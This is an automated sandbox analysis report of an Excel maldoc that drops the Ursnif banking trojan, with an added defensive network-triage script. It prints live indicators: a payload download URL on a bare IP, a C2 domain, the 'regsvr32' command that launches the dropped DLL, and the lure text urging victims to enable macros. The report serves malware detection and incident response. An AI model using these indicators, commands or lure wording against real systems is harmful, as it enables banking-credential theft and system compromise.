
Analysis Report Rrapporto.xlsb

Overview

General Information

Sample Name: Rrapporto.xlsb
Analysis ID: 316011
MD5: 4dddb0320eac6050d6360c92c104d05c
SHA1: 816db7af62de3dc200b88357a5341c6ce184cc93
SHA256: ae87b82d817d363b159e072be2e2017dfe0bcf7fd3bc6a7c9dee0ff885eefc5f


Detection

Hidden Macro 4.0 Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Creates a COM Internet Explorer object
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Downloads files with wrong headers with respect to MIME Content-Type
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5716 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 1620 cmdline: regsvr32 -s C:\ProgramData\Dori.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 5104 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5900 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5104 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 1296 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5428 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1296 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 2856 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6116 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2856 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 4676 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4176 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4676 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5492 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5844 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5492 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 4476 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 1056 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4476 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000003.667994704.0000000005AA0000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.668473808.0000000005AA0000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.668884278.0000000005AA0000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.668296205.0000000005AA0000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis
Data:
  Command: regsvr32 -s C:\ProgramData\Dori.ocx
  CommandLine: regsvr32 -s C:\ProgramData\Dori.ocx
  CommandLine|base64offset|contains: ,
  Image: C:\Windows\SysWOW64\regsvr32.exe
  NewProcessName: C:\Windows\SysWOW64\regsvr32.exe
  OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe
  ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
  ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
  ParentProcessId: 5716
  ProcessCommandLine: regsvr32 -s C:\ProgramData\Dori.ocx
  ProcessId: 1620

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://45.138.72.84/10.11nov322.gif | Avira URL Cloud: Label: malware
Source: 1.2.regsvr32.exe.320000.1.unpack | Avira: Label: TR/Patched.Ren.Gen

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: 10.11nov322[1].gif.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Section loaded: \KnownDlls32\WININET.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Downloads files with wrong headers with respect to MIME Content-Type
Source: http | Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 13 Nov 2020 13:07:52 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 13 Nov 2020 08:48:47 GMT ETag: "23400-5b3f918bfb9c0" Accept-Ranges: bytes Content-Length: 144384 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/gif
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK Date: Fri, 13 Nov 2020 13:07:52 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 13 Nov 2020 08:48:47 GMT ETag: "23400-5b3f918bfb9c0" Accept-Ranges: bytes Content-Length: 144384 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/gif
Source: Joe Sandbox View | JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: unknown | TCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: global trafficHTTP traffic detected: GET /10.11nov322.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.138.72.84Connection: Keep-Alive
            Source: msapplication.xml0.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x2ca85b4a,0x01d6b9be</date><accdate>0x2ca85b4a,0x01d6b9be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x2ca85b4a,0x01d6b9be</date><accdate>0x2ca85b4a,0x01d6b9be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2cad2001,0x01d6b9be</date><accdate>0x2cad2001,0x01d6b9be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2cad2001,0x01d6b9be</date><accdate>0x2cad2001,0x01d6b9be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml7.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2cad2001,0x01d6b9be</date><accdate>0x2cad2001,0x01d6b9be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2cad2001,0x01d6b9be</date><accdate>0x2caf8257,0x01d6b9be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: bonderlas.xyz
            Source: regsvr32.exe, 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmpString found in binary or memory: http://%s=%s&file://&os=%u.%u_%u_%u_x%uindex.html;
            Source: sharedStrings.binString found in binary or memory: http://45.138.72.84/10.11nov322.gif
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/0
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
            Source: Dori.ocx.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
            Source: Dori.ocx.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
            Source: Dori.ocx.0.drString found in binary or memory: http://ocsp.sectigo.com0
            Source: msapplication.xml.5.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml1.5.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml2.5.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml3.5.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml4.5.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml5.5.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml6.5.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml7.5.drString found in binary or memory: http://www.youtube.com/
            Source: regsvr32.exe, regsvr32.exe, 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmpString found in binary or memory: https://bonderlas.xyz
            Source: regsvr32.exe, 00000001.00000003.906109706.000000000272E000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000003.757764964.0000000002747000.00000004.00000001.sdmpString found in binary or memory: https://bonderlas.xyz/
            Source: regsvr32.exe, 00000001.00000003.792943006.0000000002747000.00000004.00000001.sdmpString found in binary or memory: https://bonderlas.xyz/U
            Source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000002.932139128.00000000026DA000.00000004.00000020.sdmp, ~DF275CD125B53CA979.TMP.14.drString found in binary or memory: https://bonderlas.xyz/index.htm
            Source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmpString found in binary or memory: https://bonderlas.xyz/index.htm19j%
            Source: {847E0F0B-25B1-11EB-90EB-ECF4BBEA1588}.dat.12.drString found in binary or memory: https://bonderlas.xyz/index.htmRoot
            Source: regsvr32.exe, 00000001.00000002.932139128.00000000026DA000.00000004.00000020.sdmpString found in binary or memory: https://bonderlas.xyz/index.htma;
            Source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmpString found in binary or memory: https://bonderlas.xyz/index.htmh
            Source: {847E0F0B-25B1-11EB-90EB-ECF4BBEA1588}.dat.12.drString found in binary or memory: https://bonderlas.xyz/index.htmindex.htm
            Source: regsvr32.exe, 00000001.00000002.932139128.00000000026DA000.00000004.00000020.sdmpString found in binary or memory: https://bonderlas.xyz/index.htmne
            Source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmpString found in binary or memory: https://bonderlas.xyz/index.htmr=
            Source: Dori.ocx.0.drString found in binary or memory: https://sectigo.com/CPS0
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
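            The direct-to-IP connections and the GET for /10.11nov322.gif above are the two network indicators a responder would script a check for; later in this report the cached 10.11nov322[1].gif and the dropped Dori.ocx carry the same SHA-256, i.e. a PE served under a .gif name. The following is an added example, not part of the Joe Sandbox report: a triage pass over constructed flow events (the DNS answer for bonderlas.xyz is assumed, the report does not show it) that flags TCP destinations never returned by a DNS answer, HTTP requests whose Host header is a bare IP, and responses whose body is a PE but whose Content-Type is not an executable type.

```python
"""
Network triage over constructed flow events, modelled on this report's
findings: repeated TCP connections to 45.138.72.84 with no DNS answer
for that address, and a GET for /10.11nov322.gif that returns a PE
(the cached .gif and the dropped Dori.ocx share one SHA-256).
Added example; the events are constructed, not the sandbox's pcap.
"""
import ipaddress
import struct
from typing import Dict, List, Set

# MIME types under which a PE body is not a mismatch.
EXECUTABLE_TYPES = {
    "application/x-msdownload",
    "application/octet-stream",
    "application/vnd.microsoft.portable-executable",
}


def is_pe(data: bytes) -> bool:
    """True if data starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def content_type_mismatch(content_type: str, body: bytes) -> bool:
    """A PE delivered under a non-executable Content-Type (e.g. image/gif)."""
    declared = content_type.split(";")[0].strip().lower()
    return is_pe(body) and declared not in EXECUTABLE_TYPES


def host_is_literal_ip(host: str) -> bool:
    """Host header is a bare IP address (a trailing :port on IPv4 hosts is stripped)."""
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def find_direct_ip_connections(events: List[Dict]) -> List[str]:
    """Public destinations contacted over TCP that no DNS answer in the capture resolved to."""
    resolved: Set[str] = set()
    flagged: List[str] = []
    for ev in events:
        if ev["type"] == "dns":
            resolved.update(ev["answers"])
        elif ev["type"] == "tcp":
            dst = ev["dst"]
            if ipaddress.ip_address(dst).is_private:  # skip local infrastructure
                continue
            if dst not in resolved and dst not in flagged:
                flagged.append(dst)  # repeats of the same destination collapse to one
    return flagged


def triage(events: List[Dict]) -> Dict[str, List[str]]:
    """Collect the three indicators as lists; URLs are rebuilt from Host and path."""
    findings: Dict[str, List[str]] = {
        "direct_ip_tcp": find_direct_ip_connections(events),
        "literal_ip_host": [],
        "mime_mismatch": [],
    }
    for ev in events:
        if ev["type"] != "http":
            continue
        url = f"http://{ev['host']}{ev['path']}"
        if host_is_literal_ip(ev["host"]):
            findings["literal_ip_host"].append(url)
        if content_type_mismatch(ev["content_type"], ev["body"]):
            findings["mime_mismatch"].append(url)
    return findings


def _fake_pe() -> bytes:
    """Constructed stand-in for the downloaded DLL: MZ stub, e_lfanew=0x40, PE signature."""
    buf = bytearray(0x80)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\x00\x00"
    return bytes(buf)


FAKE_PE = _fake_pe()

# Constructed sample events. 203.0.113.10 (a documentation address) stands in for
# whatever bonderlas.xyz resolved to; the report does not show that answer.
SAMPLE_EVENTS = [
    {"type": "dns", "name": "bonderlas.xyz", "answers": ["203.0.113.10"]},
    {"type": "tcp", "dst": "203.0.113.10", "dport": 443},
    {"type": "tcp", "dst": "45.138.72.84", "dport": 80},
    {"type": "tcp", "dst": "45.138.72.84", "dport": 80},
    {"type": "http", "dst": "45.138.72.84", "host": "45.138.72.84",
     "path": "/10.11nov322.gif", "content_type": "image/gif", "body": FAKE_PE},
]

if __name__ == "__main__":
    for key, hits in triage(SAMPLE_EVENTS).items():
        print(f"{key}: {hits}")
```

            The PE check reads e_lfanew rather than trusting the "MZ" prefix alone, so a GIF that merely starts with those two bytes is not flagged; the DNS correlation deliberately ignores private destinations, which keeps the sandbox's own resolver and gateway out of the result.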

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected Ursnif
            Source: Yara matchFile source: 00000001.00000003.667994704.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668473808.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668884278.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668296205.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667535091.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667824445.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668952879.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667736217.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667639814.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668760618.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668844490.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668083281.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668527386.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668803877.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669148269.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668230712.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669122907.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669084633.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668920606.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667912734.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669040349.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667438738.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669062801.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669138033.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669012249.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.932781395.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668636640.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668166944.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669108055.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668584629.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668358027.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668983216.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1620, type: MEMORY

            E-Banking Fraud:

            Yara detected Ursnif
            Source: Yara matchFile source: 00000001.00000003.667994704.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668473808.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668884278.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668296205.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667535091.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667824445.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668952879.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667736217.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667639814.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668760618.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668844490.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668083281.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668527386.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668803877.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669148269.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668230712.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669122907.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669084633.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668920606.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667912734.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669040349.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667438738.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669062801.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669138033.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669012249.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.932781395.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668636640.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668166944.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669108055.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668584629.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668358027.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668983216.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1620, type: MEMORY

            System Summary:

            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
            Source: Screenshot number: 4Screenshot OCR: Enable Editing" 11_ from the yellow bar above 12 ::- @ Once You have Enable Editing, please click
            Source: Screenshot number: 4Screenshot OCR: Enable Content" 15" from the yellow bar above 16 17 18 WHY I CANNOT OPEN THIS DOCUMENT? 19 20
            Found Excel 4.0 Macro with suspicious formulas
            Source: Rrapporto.xlsbInitial sample: EXEC
            Found abnormal large hidden Excel 4.0 Macro sheet
            Source: Rrapporto.xlsbInitial sample: Sheet size: 583568
            Found obfuscated Excel 4.0 Macro
            Source: Rrapporto.xlsbInitial sample: High usage of CHAR() function: 97
